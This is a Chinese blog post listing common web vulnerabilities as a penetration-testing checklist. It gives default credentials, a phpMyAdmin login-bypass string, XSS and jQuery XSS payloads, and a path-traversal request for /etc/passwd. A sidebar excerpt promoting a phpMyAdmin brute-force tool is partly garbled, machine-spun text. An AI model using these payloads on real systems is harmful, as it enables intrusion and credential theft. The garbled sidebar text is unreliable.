web应用常见的其他漏洞总结

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量358 收藏
点赞数 1
分类专栏: 漏洞相关 文章标签: 安全 web安全 网络 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79194110/article/details/133689157
版权

1.暴力破解用户名和密码

admin:admin, test:test, weblogic:weblogic, root:passwd

2. 扫敏感目录及备份文件

以ation 为扩展名的文件,通过7kb和k8,破壳扫描,扫描出来一个Web.rar文件,可获取MSSQL     SSA连接用户名密码,通过测试数据库可远程连接。
config.inc配置文件,通过破壳7Kb扫描可以直接获取密码value后面为密码
        

配置文件 

3.PhpMyadmin的万能密码

 输入localhost’@'@”即可绕过phpmyadmin的登录入口。
在这里输入2.11.2.1可以绕过 

4. 报错页面的图片也是可以存在反射型XSS的

拼接单引号报错,先XSS弹窗,然后WAF再提示“信息提示:请不要提交恶意字符”
 http://xxxxxx.com/BICP/framework/images/mainSkin/mainFrm/errorIcon.png”   是图片出现xss漏洞
></textarea><script>alert(/TOPSEC/)<%2fscript>    将报错信息换成自己需要的东西 

5.隐藏域中可能存着明文密码

 隐藏密码要通过检查修改密码的类型为text就为明文密码
密码为隐藏状态


右键检查将密码这里的类型改为text


密码为明文密码


 可能存在注释有账号密码 

6. 逻辑漏洞——任意用户密码重置

通过burp爆破 

 7. 短信炸弹

无限的发短信

 8. SVN(是一个软件)源码泄露

通过扫描器扫描(绿盟,天镜,极光等),7kb扫文件扫目录拼接后面这个/.svn/entries扫描出这个直接在地址后面拼接https://www.xxx.com/.svn/entries    使用seay-svn软件连接,可以查看源代码 

9.局域网共享

共享的文件会被扫描器扫到(nessus)
 如果处在内网环境,就可以扫描一下共享文件 

10.扫一下端口

 nmap扫端口,开放着9091、21端口,浏览器打开发现9091是另一个WEB应用,有可能对应着不同的WEB应用 

 11.发掘隐藏的链接地址

右边的“相关软件”的链接,存在一个任意文件下载漏洞
treasuryauth/authAction.do?method=download&fileName=../../../../../../etc/passwd   

12.IIS短文件名泄露漏洞(只有IIS有)

 java2 scanner 2 20 http://10.0.0.139:83/(awvs可以扫到)
验证:没有漏洞,有漏洞文件名不会显示全,只会显示一部分


有漏洞的 情况

13.HTTP(crlf注入漏洞)响应拆分漏洞

SETCOOKIE的换行空格都被过滤掉了
        https://blog.csdn.net/weixin_39190897/article/details/124527204
 防御方法
        1.对用户的数据进行合法性校验,对特殊的字符进行编码,如<、>、’、”、CR、LF等,限制用户输入的 CR 和 LF,或者对 CR 和 LF 字符正确编码后再输出,以防止注入自定义 HTTP 头;
        2.创建安全字符白名单,只接受白名单中的字符出现在 HTTP 响应头文件中;
        3.在将数据传送到 http 响应头之前,删除所有的换行符。

14.jQuery存在XSS漏洞

检查方法
1)    在这个网站查询相应的jquery版本存在的漏洞。
2)    访问目标站,在浏览器控制台中测试漏洞:
* Bug 9521 - $("#<img src=x οnerrοr=alert(1)>")
* Bug 11290 - $("element[attribute='<img src=x οnerrοr=...>'")
* jQuery issue 2432 - $.get('https://sakurity.com/jqueryxss')
* jQuery issue 11974 - $("element[attribute='<img src=x οnerrοr=alert(1)>’")
  在后面输入

15.目录浏览(利用目录)

 勾选这个目录浏览按钮
        
可以浏览


取消掉勾不可以访问

16.URL跳转漏洞


    
         

17.框架钓鱼漏洞(xss)

 存在可注入frame或iframe标记
        

 18.点击劫持(xss)
    

应用程序没有对用户提交的数据进行有效的过滤或转换,攻击者可向WEB页面里插入对终端用户造成影响或损失的恶意链接。
点击test  忽略了一个按钮

19.HTTP报头追踪漏洞

目标网站支持TRACE/TRACK WEB服务器HTTP连接方式调节功能。当该调试功能开启时,包含敏感信息的HTTP报头可能被攻击者追踪截获。经检测发现该网站存在HTTP报头协议追踪漏洞。
直接将post和get改为trace 

 20.私有IP泄露(内网)

回包中会有IP
        

 21. 系统重装漏洞

搭建完网站install.php没有删除(要删除或者重命名)

布满杂草的荆棘
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin忘记密码解决办法
Nuyoah的博客
04-21 5604
phpmyadmin忘记密码怎么办 1,找到wampserver的安装目录,打开mysql下bin目录中的my.ini 比如我的位置在:C:\wamp64\bin\mysql\mysql5.7.26 2,打开my.ini,找到如下位置,加入命令 skip_grant_tables ,保存并重启wampserver 3,打开cmd 进入到C:\wamp64\bin\mysql\mysql5.7.26\bin目录 输入mysql -uroot -p回车 4,不用输入密码,再回车,如图: 5,重新设置密码
PHPmyadmin 2.11.4万能密码
java开发指南博客 【转载】
05-21 240
‘localhost’@’@” PHPmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 给你找到一个测试网址http://www.hitag.cn 你们可以试一下 只需要输入账号 密码不需要输入 利用代码如下: ‘localhost’@’@” 原文章http://www.0x6.us/?FoxNews=5....
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1152
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
爆破phpmyadmin
m0_51589948的博客
08-08 1192
爆破phpmyadmin 因为是第一次写脚本,所以没有爆破phpmyadmin的思路 后来百度到很多爆破phpmyadmin的脚本,找到了一些思路 大概就是用python构造对phpmyadmin的登录请求,根据登录前后的源码中的一些不同的信息判断是否登录成功,我们又从发送的请求包中获取了请求参数,以及文件头信息·pma_username=roofffffft&pma_password=fffroot&server=1&token=3b88f0df1d082083aae8b4ccc
常见漏洞类型汇总
A_991128a的博客
06-17 1050
SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。(1)表单提交,主要是POST请求,也包括GET请求;(2)URL参数提交,主要为GET请求参数;(3)Cookie参数提交;
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1367
phpmyadmin弱口令至getshell 漏洞复现
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
Web应用程序常见漏洞CSRF的入侵检测与防范
03-01
互联网的安全问题一直存在,并且在可预见的未来中没有消弭的迹象...跨站请求伪造(CSRF)的是Web应用程序一种常见漏洞,其攻击特性是危害性大但非常隐蔽,尤其是在大量Web2.0技术的应用的背景下,CSRF攻击完全可以在
Web应用常见漏洞修复方案
12-01
Web 应用常见漏洞修复方案 在 Web 应用程序中,安全漏洞是非常普遍的存在,而 SQL 注入攻击、跨站脚本攻击和跨站请求伪造是最常见的三种漏洞,本篇文章将详细介绍这三种漏洞的成因、危害和防护措施。 一、SQL 注入...
常见web应用漏洞和检测方案
06-06
常见web应用漏洞和检测方案 明文信息传输漏洞 敏感信息泄露 默认或可猜解用户账户 会话重放攻击测试 验证码缺陷 http方法测试 不安全的cookie传输 CSRF漏洞测试 会话设计缺陷 会话定置测试 会话复杂度测试 会话...
web安全常见漏洞浅析
01-08
本资源摘要信息将对 web 安全常见漏洞进行浅析,涵盖 Web 业务与应用逻辑缺陷。 一、Web 业务逻辑缺陷 Web 业务逻辑是指 Web 应用程序中与业务相关的逻辑,例如注册、登录、忘记密码、支付逻辑等。在 Web 业务逻辑...
phpMyAdmin暴力破解v1.3
07-21
我正在网上搜刮了一下没发明相干的东西, 因而本身出手翰单真现这听命, 而今phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此东西仅供网友技术进修交换利用,请勿利用于犯警用处。 MySQL数据库字典,人人就本身网上支散了! 当前版本 v1.2 MD5:541465699949f3d60fcea923ccf245b2 sha1:e23d7ce46606d530abc4a9e473bdb0b5247aaff1 – ver1.2 措置对phpMyAdmin3.2.5版本暴破有标题问题,删加了一个工作线程, 美化了界面。 – ver1.1 1.0版本有个标题问题,正在win7、vista下都不能正常扫描, 现曾纠正过往。 ————————————————— 技术总结: 《vc6建正删除cookie真现》 InternetSetCookie函数太老,能建正一般cookie值,但是正在win7下高版本Wininet.DLL中无法让HTTPONLY类型的cookie过时, 要利用InternetSetCookieEx函数才成功,正在vs2010下直接用该函数,vc6下本身加载模块查找函数, vc6下查找利用该函数删除cookie以下: HINSTANCE hInst = LoadLibrary(“Wininet.DLL”); if(hInst) { typedef BOOL (WINAPI *pfnInternetSetCookieEx)(LPCSTR, LPCSTR, LPCSTR, DWORD, DWORD); pfnInternetSetCookieEx InternetSetCookieEx = NULL; InternetSetCookieEx = (pfnInternetSetCookieEx)GetProcAddress(hInst, “InternetSetCookieExA”); //InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); FreeLibrary(hInst); } 寄看,要分隔设置cookie字段,不能一次设置多个字段,不然不成功,下面的语句只要第一个字段被设置成功,其它字段均不成功! InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; pma_mcrypt_iv=; pmaUser-1=; pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 精确理当如许写, InternetSetCookieEx(m_url, NULL, ” phpMyAdmin=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pma_mcrypt_iv=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaUser-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); InternetSetCookieEx(m_url, NULL, ” pmaPass-1=; expires=Thu, 01-Jan-1900 00:00:01 GMT”, INTERNET_COOKIE_HTTPONLY, NULL); 1>
phpMyAdmin多线程批量破解工具
10-16
phpMyAdmin多线程批量破解工具是一款用于数据库密码强制破解的工具,了解它的朋友想必不用做过多的介绍就应该了解他他是做什么的。 之前朋友问我有木有phpMyAdmin批量破解工具, 我在网上搜索了一下并没有发现相关的工具,然后自己动手写了一款,多线程批量破解phpMyAdmin的工具,支持破解phpMyAdmin 2.11.10到4.4.11版本,如果需要支持变量用户名及密码(如%user%%domain%) 请私人定制。你还在为MySQL的外连功能关闭而烦恼吗,利用phpMyAdmin破解数据库账户密码的工具来了。
Web安全——穷举爆破上篇(仅供学习)
钟言的博客
09-02 4555
本篇为Web安全的穷举篇,详细内容包含了二、常见的服务 1、burpsuite 穷举后台密码 2、burpsuite 对 webshell 穷举破解密码3、有 token 防御的网站后台穷举破解密码3.1 burpsuite 设置宏获取 token 对网站后台密码破解3.2 编写脚本获取token 对网站后台密码破解4、针对有验证码后台的穷举方法 4.1 cookie 不存在不验证绕过 4.2 后台登录验证码没销毁进行穷举4.3 网站后台验证码识别穷举密码 5、phpmyadmin 密码穷举 6、一句话等等
Iframe框架钓鱼攻击
m0_62425768的博客
11-19 474
Iframe框架钓鱼网站是指那些假扮成合法网站的虚假网站,旨在诱骗用户提供个人信息、账号密码、财务信息等敏感信息。这些网站通常会模仿知名的银行、电子支付平台、电子邮件服务提供商等机构的网站,以迷惑用户并诱使他们输入敏感信息。原理是,使用正则表达式来判断前端传过来的值是否正常,如不正常则不允以应答,如正常则向前端返回前端Iframe标签中的值。当前端传过来的值为InN时,执行doYInframe方法,可防护Iframe框架钓鱼的后端代码。在访问银行、支付平台等网站时,确保网址正确,使用书签或手动输入网址。
IBM Security Appscan漏洞--通过框架钓鱼
YouXu
03-16 6360
通过框架钓鱼
php绕过登录访问系统,phpMyAdmin server_user_groups.php访问限制绕过漏洞
weixin_42524792的博客
03-24 413
发布日期:2014-07-20更新日期:2014-07-22受影响系统:phpMyAdmin phpMyAdmin < 4.2.6phpMyAdmin phpMyAdmin < 4.1.14.2描述:--------------------------------------------------------------------------------CVE(CAN) ID: C...
phpMyAdmin 初始用户名 密码
热门推荐
Scarlett的博客
02-12 3万+
1. phpMyAdmin 文件下 将config.sample.inc.php 复制一份 改名为config.inc.php 默认情况下 用户名是 root 密码是 空 直接就能登录了 我改了几行代码, 测试是用 root 123456 能登陆 root 空密码也可以登录 //$cfg['Servers'][$i]['host'] = 'localhost'; $cf...
"Web编程常见漏洞与检测:白盒检测与常见漏洞分析
Web编程中常见漏洞与检测是一个在Web设计者和Web应用系统管理者中都非常重要的话题。对于设计者来说,了解常见漏洞类型以及如何检测和修复它们是至关重要的,而对于系统管理者来说,及时发现和修复漏洞可以极大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值